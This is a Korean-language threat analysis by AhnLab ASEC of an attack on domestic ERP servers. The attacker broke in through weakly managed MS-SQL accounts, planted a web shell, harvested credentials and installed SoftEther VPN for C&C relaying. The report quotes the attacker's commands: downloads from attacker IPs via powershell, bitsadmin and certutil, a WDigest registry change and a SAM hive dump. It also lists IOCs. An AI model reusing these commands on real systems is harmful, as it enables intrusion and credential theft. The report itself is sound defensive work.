SoftEther VPN을 설치하는 국내 ERP 서버 대상 공격 사례 분석

AhnLab SEcurity intelligence Center(ASEC)은 최근 국내 기업의 ERP 서버를 공격하여 VPN 서버를 설치하는 공격 사례를 확인하였다. 공격자는 최초 침투 과정에서 MS-SQL 서비스를 공격하였으며 이후에는 웹쉘을 설치하여 지속성을 유지하고 감염 시스템을 제어하였다. 여기까지의 과정이 끝난 후에는 감염 시스템을 VPN 서버로 활용하기 위해 최종적으로 SoftEther VPN 서비스를 설치한 것이 특징이다.

1. Proxy 및 VPN 서비스

Proxy 및 VPN은 중계 서버를 거쳐 통신하는 기술로서 사용자는 인터넷을 통해 외부와 통신할 때 이를 활용하여 프라이버시와 보안을 강화하고 지리적 제한을 우회할 수 있다. 이러한 점은 공격자에게도 이점을 줄 수 있기 때문에 공격자들은 공격 과정에서 다양한 Proxy, VPN 도구들을 사용하기도 한다. APT 그룹이나 랜섬웨어 그룹 등 공격 대상의 내부 네트워크까지 장악하는 것을 목표로 하는 공격자들의 경우 FRP [1], HTran [2] 등 다양한 도구들을 공격 과정에서 사용한다.

물론 알려진 도구들 외에 직접 악성코드를 제작하는 사례도 존재하는 데 예를 들어 SystemBC는 Socks5 프록시 기능을 지원하는 Proxy Bot이다. 만약 공격자가 SystemBC를 조직의 내부 네트워크에 접근이 가능한 시스템에 설치할 수 있다면 이를 통해 외부에 위치한 공격자가 SystemBC를 거쳐 내부망에 대한 접근이 가능해진다. [3]

또 다른 사례로 Bunitu가 있는데 Malwarebytes 사에 따르면 공격자는 malvertising 캠페인을 통해 많은 시스템들을 감염시켜 Proxy Bot인 Bunitu를 설치하였으며 이후 VPN 업체들에 이를 판매하였다. 즉 VPN 업체들은 Bunitu가 설치된 감염 시스템들을 중계 서버로 하여 VPN 서비스를 사용자들에게 제공하게 되었다. [4]

공격 사례들 중에는 Proxy 도구들이나 악성코드들을 활용하는 사례도 많지만 VPN 서비스를 설치하는 사례도 존재한다. 공격에 사용되는 VPN 도구들 중에는 오픈 소스인 SoftEther VPN이 자주 사용되는 편이다. 예를 들어 MS 사의 보고서에서 GALLIUM 공격자는 공격 대상의 네트워크에 SoftEther VPN 서버를 설치함으로써 이를 거쳐 내부 네트워크에 접근할 수 있도록 하였다. [5] 물론 이외에도 Kaspersky 사가 공개한 ToddyCat 공격자의 공격 사례나 [6] Mandiant 사에서 공개한 UNC3500의 공격 과정에서도 SoftEther VPN을 설치한 사례들도이 알려져 있다. [7]

2. 공격 사례 분석

최근 국내 기업의 ERP 서버를 대상으로 하는 공격 사례가 확인되었으며 초기에는 부적절하게 관리되는 MS-SQL 서버를 공격하여 침투한 것으로 추정된다. 공격자는 다음과 같은 명령들을 이용해 네트워크를 탐색하고 추가 공격이 가능할지를 판단하였다.

> ping -n 10 127.0.0.1 > whoami > ipconfig > hostname > tasklist > query user > netstat -ano -p tcp

참고로 공격자가 설치하려고 한 “vmtoolsd1.exe”는 정상 파일로 추정되는데 이는 최근에도 동일한 경로에 마이크로소프트의 VisualStudio Code 프로그램을 다운로드하였기 때문이다. 즉 최종적으로 공격을 진행하기 이전에 추가 페이로드를 다운로드할 수 있는지를 테스트하기 위한 과정으로 추정된다.

> powershell (new-object System.Net.WebClient).DownloadFile( ‘hxxp://45.77.44[.]127/vmtoolsd.exe’,’C:\ProgramData\vmtoolsd1.exe’)” > bitsadmin /transfer MyDownloadJob1 hxxp://45.77.44[.]127/vmtoolsd.exe C:\ProgramData\vmtoolsd1.exe > certutil -urlcache -sploit -f hxxp://45.77.44[.]127/vmtoolsd.exe > certutil -urlcache -split -f hxxp://167.99.75[.]170/vmtoolsd.exe > bitsadmin /transfer MyDownloadJob1 hxxp://167.99.75[.]170/vmtoolsd.exe C:\ProgramData\vmtoolsd1.exe

공격자는 테스트가 끝난 이후 다음과 같은 명령을 이용해 웹쉘을 설치하였는데 “bashupload.com”이 사용된 것이 특징이다. 다운로드가 성공한 이후 이를 삭제하여 파일은 확보되지 않았지만 이후 웹 서버 프로세스를 통해 명령들이 실행된 로그들이 확인된 점을 통해 성공적으로 웹쉘을 설치한 것으로 보인다.

웹쉘을 설치한 이후에는 이를 이용해 명령을 실행하였다. 확인된 명령들은 시스템에 존재하는 자격 증명 정보를 탈취하기 위한 명령들이 대부분이다.

> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f > reg save hklm\sam sam.hive /y

여기까지의 과정이 끝나면 다음과 같은 Batch 파일을 다운로드해 실행하였다. Batch 파일은 다운로더 악성코드로서 SoftEther VPN 서버를 “sqlwrite1.exe”라는 이름으로 설치하는 기능을 담당한다. 참고로 “hamcore.se2”는 설치 과정에서 필요한 데이터 파일이며 “vpn_server.config” 파일은 설정 파일이다.

참고로 공격자는 공격 대상이 된 ERP 서버를 단순히 VPN 서버로 활용하는 것이 목적은 아닌 것으로 보인다. 공격자가 사용한 설정 파일은 단독으로 VPN 서비스를 제공하는 서버로서의 역할이 아닌 또 다른 VPN 서버에 연결하는 “Cascade Connection” 방식으로 동작한다. 즉 공격자는 보안 및 프라이버시를 강화하고 실제 C&C 서버에 대한 추적을 방해하기 위한 C&C 인프라 구축을 위해 활용하는 것으로 추정된다.

3. 결론

최근 국내 ERP 서버를 공격하여 VPN 서버를 구축하는 공격 사례가 확인되었다. 최초 침투 방식은 부적절하게 계정 정보를 관리하고 있는 MS-SQL 서버를 대상으로 한 것으로 추정된다.

관리자들은 계정의 비밀번호를 추측하기 어려운 형태로 사용하고 주기적으로 변경하여 무차별 대입 공격과 사전 공격으로부터 데이터베이스 서버를 보호해야 한다. 그리고 외부에 공개되어 접근 가능한 데이터베이스 서버에 대해 방화벽과 같은 보안 제품을 이용해 외부 공격자로부터의 접근을 통제해야 한다. 이러한 조치가 선행되지 않을 경우 공격자 및 악성코드들에 의해 계속적인 감염이 이루어질 수 있다.

파일 진단
– Downloader/BAT.Agent.SC199990 (2024.06.08.00)
– Data/BIN.Config (2024.06.10.02)

행위 진단
– CredentialAccess/MDP.Mimikatz.M4367
– Execution/MDP.Powershell.M4624
– Execution/MDP.Certutil.M4771

MD5

aac76af38bfd374e83aef1326a9ea8ad

ef340716a83879736e486f331d84a7c6

URL

http[:]//116[.]202[.]251[.]4/vmtoolsd[.]exe

http[:]//167[.]99[.]75[.]170/dns003/hamcore[.]se2

http[:]//167[.]99[.]75[.]170/dns003/sqlwritel[.]exe

http[:]//167[.]99[.]75[.]170/tun02[.]bat

http[:]//167[.]99[.]75[.]170/tun02/vpn_server[.]config